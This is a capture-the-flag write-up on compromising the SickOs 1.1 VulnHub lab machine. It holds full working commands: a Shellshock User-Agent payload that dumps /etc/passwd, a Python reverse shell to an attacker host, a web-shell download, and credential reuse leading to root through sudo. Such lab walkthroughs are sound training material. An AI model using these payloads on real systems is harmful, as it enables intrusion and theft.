SickOs: 1.1 VulnHub Writeup

  1. Service discovery
  2. Port 80
  3. Time to snoop
  4. sickos
  5. Conclusion

Another Friday, another VM. This time it's SickOs 1.1 by D4rk. The machine description mentions OSCP - as I'll be taking that certification in January, I jumped at the chance to give this VM a spin.

First of all, I had to convert the disk to a VDI in order to use it in VirtualBox.

$ VBoxManage clonehd --format VDI SickOs1.1-disk1.vmdk SickOs1.1-disk1.vdi

Once that was done, I created a 64-bit Linux VM with 512MB of RAM and attached the converted disk.
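
Attaching the converted disk can be done through the GUI or with VBoxManage. A rough sketch - the VM name and storage controller name here are assumptions that depend on how you created the VM:

$ VBoxManage storageattach "SickOs1.1" --storagectl "SATA" --port 0 --device 0 --type hdd --medium SickOs1.1-disk1.vdi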

Service discovery

First things first, I run nmap against the target. The first attempt fails because the target doesn't respond to ping, so I re-run the full scan with -Pn to skip host discovery.

$ nmap -p 1-65535 -T5 -A -v -sT 192.168.57.101

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-11 11:51 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating Ping Scan at 11:51
Scanning 192.168.57.101 [2 ports]
Completed Ping Scan at 11:51, 1.50s elapsed (1 total hosts)
Nmap scan report for 192.168.57.101 [host down]
NSE: Script Post-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.95 seconds

$ nmap -p 1-65535 -T5 -A -v -sT -Pn 192.168.57.101

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-11 11:51 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 0.02s elapsed
Initiating Connect Scan at 11:51
Scanning 192.168.57.101 [65535 ports]
Discovered open port 22/tcp on 192.168.57.101
Discovered open port 3128/tcp on 192.168.57.101
Completed Connect Scan at 11:52, 53.73s elapsed (65535 total ports)
Initiating Service scan at 11:52
Scanning 2 services on 192.168.57.101
Completed Service scan at 11:52, 11.03s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.57.101.
Initiating NSE at 11:52
Completed NSE at 11:52, 20.20s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Nmap scan report for 192.168.57.101
Host is up (0.00091s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.57 seconds

So we've got an SSH server and a Squid proxy.

There's nothing useful in the SSH server's banner, so I move on to check out the Squid proxy.
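
For reference, the banner check is nothing more than a netcat connection, and it returns only the SSH-2.0 protocol string nmap already reported:

$ nc -nv 192.168.57.101 22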

Using nmap's proxy options, I perform a limited scan of localhost via the proxy.

$ nmap --proxy http://192.168.57.101 -T5 -A -v -sT -Pn 127.0.0.1

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-11 12:16 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Initiating Connect Scan at 12:16
Scanning localhost (127.0.0.1) [1000 ports]
Discovered open port 22/tcp on 127.0.0.1
Discovered open port 80/tcp on 127.0.0.1
Discovered open port 631/tcp on 127.0.0.1
Discovered open port 5432/tcp on 127.0.0.1
Completed Connect Scan at 12:16, 0.01s elapsed (1000 total ports)
Initiating Service scan at 12:16
Scanning 4 services on localhost (127.0.0.1)
Completed Service scan at 12:16, 0.00s elapsed (4 services on 1 host)
NSE: Script scanning 127.0.0.1.
Initiating NSE at 12:16
Completed NSE at 12:16, 5.38s elapsed
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000038s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  tcpwrapped
80/tcp   open  tcpwrapped
|_xmlrpc-methods: ERROR: Script execution failed (use -d to debug)
631/tcp  open  tcpwrapped
|_xmlrpc-methods: ERROR: Script execution failed (use -d to debug)
5432/tcp open  tcpwrapped

NSE: Script Post-scanning.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.02 seconds

We've got a few new ports to check out - 80, 631 and 5432.
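
As an aside, the same loopback scan can be driven through proxychains instead of nmap's built-in proxy support. A sketch - it assumes proxychains is installed and that the Squid entry below replaces the default entry under [ProxyList] in /etc/proxychains.conf:

# /etc/proxychains.conf, under [ProxyList]
http 192.168.57.101 3128

$ proxychains nmap -sT -Pn -n -p 22,80,631,5432 127.0.0.1

proxychains only relays TCP connects, hence -sT, and -n keeps DNS lookups from going through the proxy.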

Port 80

After setting up ZAP to use the target's Squid proxy on port 3128, I visit 'http://127.0.0.1' in my browser. The proxy treats that address as its own loopback, giving us access to a web server we couldn't reach directly, and we receive the following response.

HTTP/1.0 200 OK
Date: Fri, 11 Dec 2015 12:30:24 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.21
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: keep-alive


<h1>
BLEHHH!!!
</h1>
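
For reference, the same request can be reproduced from the command line by pointing curl straight at the Squid proxy - a quick sketch:

$ curl -s -i -x http://192.168.57.101:3128 http://127.0.0.1/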

I fire off a forced browse and wait to see what comes back.

In the robots.txt, we get a single interesting hit.

User-agent: *
Disallow: /
Dissalow: /wolfcms

I'll note this for later, in case we run out of steam.

Another interesting result from the forced browse is '/cgi-bin/status'. This returns what appears to be the output of a couple of shell commands (uptime and uname -a), formatted as JSON.

{ "uptime": " 18:09:36 up 49 min, 0 users, load average: 0.54, 0.30, 0.14", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

So I immediately test for Shellshock on the target, injecting a payload via the User-Agent header.

$ wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=yes -e http_proxy=192.168.57.101:3128 http://127.0.0.1/cgi-bin/status

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

Beautiful - time to get a reverse shell.

$ wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.57.102\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1" -e use_proxy=yes -e http_proxy=192.168.57.101:3128 http://127.0.0.1/cgi-bin/status

In another tab (started before sending the request above), netcat is listening on port 1234. We get our connect back!

$ nc -lv 0.0.0.0 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [192.168.57.101] port 1234 [tcp/*] accepted (family 2, sport 43799)
/bin/sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)

Time to snoop

I change directory to the web root and list the files.

$ cd /var/www
$ ls -lah
total 24K
drwxrwxrwx  3 root root 4.0K Dec  6 21:15 .
drwxr-xr-x 13 root root 4.0K Dec 11 17:19 ..
-rwxrwxrwx  1 root root  109 Dec  5 07:57 connect.py
-rw-r--r--  1 root root   21 Dec  5 06:05 index.php
-rw-r--r--  1 root root   45 Dec  5 06:05 robots.txt
drwxr-xr-x  5 root root 4.0K Dec  5 06:33 wolfcms

So we've got an installation of something called Wolf CMS.

$ cd wolfcms
$ ls -alh
total 52K
drwxr-xr-x 5 root root 4.0K Dec  5 06:33 .
drwxrwxrwx 3 root root 4.0K Dec  6 21:15 ..
-rwxr-xr-x 1 root root  950 Dec  5 06:15 .htaccess
-rwxrwxrwx 1 root root 4.0K Dec  5 06:15 CONTRIBUTING.md
-rwxrwxrwx 1 root root 2.4K Dec  5 06:15 README.md
-rwxrwxrwx 1 root root  403 Dec  5 06:15 composer.json
-rwxrwxrwx 1 root root 3.0K Dec  5 07:26 config.php
drwxrwxrwx 2 root root 4.0K Dec  5 06:15 docs
-rwxrwxrwx 1 root root  894 Dec  5 06:15 favicon.ico
-rwxrwxrwx 1 root root 6.7K Dec  5 06:32 index.php
drwxrwxrwx 4 root root 4.0K Dec  6 21:16 public
-rwxrwxrwx 1 root root    0 Dec  5 06:15 robots.txt
drwxrwxrwx 7 root root 4.0K Dec  5 06:25 wolf

Within the wolfcms directory, there's a config.php file.

$ cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);

// The full URL of your Wolf CMS install
define('URL_PUBLIC', '/wolfcms/');

// Use httpS for the backend?
// Before enabling this, please make sure you have a working HTTP+SSL installation.
define('USE_HTTPS', false);

// Use HTTP ONLY setting for the Wolf CMS authentication cookie?
// This requests browsers to make the cookie only available through HTTP, so not javascript for example.
// Defaults to false for backwards compatibility.
define('COOKIE_HTTP_ONLY', false);

// The virtual directory name for your Wolf CMS administration section.
define('ADMIN_DIR', 'admin');

// Change this setting to enable mod_rewrite. Set to "true" to remove the "?" in the URL.
// To enable mod_rewrite, you must also change the name of "_.htaccess" in your
// Wolf CMS root directory to ".htaccess"
define('USE_MOD_REWRITE', false);

// Add a suffix to pages (simluating static pages '.html')
define('URL_SUFFIX', '.html');

// Set the timezone of your choice.
// Go here for more information on the available timezones:
// http://php.net/timezones
define('DEFAULT_TIMEZONE', 'Asia/Calcutta');

// Use poormans cron solution instead of real one.
// Only use if cron is truly not available, this works better in terms of timing
// if you have a lot of traffic.
define('USE_POORMANSCRON', false);

// Rough interval in seconds at which poormans cron should trigger.
// No traffic == no poormans cron run.
define('POORMANSCRON_INTERVAL', 3600);

// How long should the browser remember logged in user?
// This relates to Login screen "Remember me for xxx time" checkbox at Backend Login screen
// Default: 1800 (30 minutes)
define ('COOKIE_LIFE', 1800);  // 30 minutes

// Can registered users login to backend using their email address?
// Default: false
define ('ALLOW_LOGIN_WITH_EMAIL', false);

// Should Wolf CMS block login ability on invalid password provided?
// Default: true
define ('DELAY_ON_INVALID_LOGIN', true);

// How long should the login blockade last?
// Default: 30 seconds
define ('DELAY_ONCE_EVERY', 30); // 30 seconds

// First delay starts after Nth failed login attempt
// Default: 3
define ('DELAY_FIRST_AFTER', 3);

// Secure token expiry time (prevents CSRF attacks, etc.)
// If backend user does nothing for this time (eg. click some link)
// his token will expire with appropriate notification
// Default: 900 (15 minutes)
define ('SECURE_TOKEN_EXPIRY', 900);  // 15 minutes

To make things easier, I transfer the trusty b374k PHP shell to the target. From there, I use the credentials above to connect to MySQL.
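
Getting the file across is straightforward: serve it from the attacking machine and pull it into the world-writable web root from the reverse shell. A sketch - the filename and port are my own choices:

# On the attacking machine, from the directory holding the shell
$ python -m SimpleHTTPServer 8000

# On the target, from the reverse shell
$ wget http://192.168.57.102:8000/b374k.php -O /var/www/b374k.php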

First of all, I check the mysql.user table. There's another user in there named 'sickos' with the same password hash as root. On a hunch, I spawn a proper TTY (su refuses to run without one) and try switching to the 'sickos' user with this password.
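
For reference, the mysql.user check is a one-liner from the shell - a sketch, with column names assuming a stock MySQL 5.5 install:

$ mysql -u root -p'john@123' -e 'SELECT User, Host, Password FROM mysql.user;'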

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su sickos
su sickos
Password: john@123

sickos@SickOs:~$ id
id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
sickos@SickOs:~$

sickos

Now that we're the sickos user, and the id output shows membership of the sudo group, I double-check the sudo permissions.

sickos@SickOs:~$ sudo -l
sudo -l
[sudo] password for sickos: john@123

Matching Defaults entries for sickos on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL

Awesome - time to get our flag!

sickos@SickOs:~$ sudo su
sudo su
root@SickOs:/home/sickos# cd /root
cd /root
root@SickOs:~# ls -alh
ls -alh
total 40K
drwx------  3 root root 4.0K Dec  6 21:14 .
drwxr-xr-x 22 root root 4.0K Sep 22 08:13 ..
-rw-r--r--  1 root root   96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3.7K Dec  6 21:18 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Sep 22 08:33 .cache
-rw-------  1 root root   22 Dec  5 06:24 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5.2K Dec  6 21:14 .viminfo
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

Conclusion

I'm not sure whether Shellshock was the intended path here. The fact that I didn't even touch the Wolf CMS instance feels a bit off, but hey, we got root and our flag.

Thanks for the fun VM, D4rk, and thank you VulnHub!